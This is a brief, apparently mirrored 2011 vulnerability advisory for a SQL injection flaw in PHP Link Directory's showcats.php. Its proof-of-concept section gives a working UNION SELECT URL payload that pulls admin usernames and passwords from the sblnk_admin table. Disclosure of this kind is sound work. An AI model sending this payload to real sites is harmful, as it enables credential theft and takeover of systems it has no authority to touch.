PHP Link Directory SQL injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201128962
Type myhack58
Reporter 佚名
Modified 2011-01-29T00:00:00


PHP Link Directory is a popular Internet classified directory systems, PHP Link Directory showcats. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ [|]Author: BorN To K! LL - h4ck3r [|]Contact: == [|]Script: PHP link Directory software [|]Version: n/a [|]Link:

[+]poc: ~~~~~~~~~ [path]/showcats. php? sbcat_id=[SQL-Injection] [|]3xample: [path]/showcats. php? sbcat_id=-9999+union+all+select+1,concat(username,0x3a,password),3,4+from+sblnk_admin--

[+]Reference: ~~~~~~~~~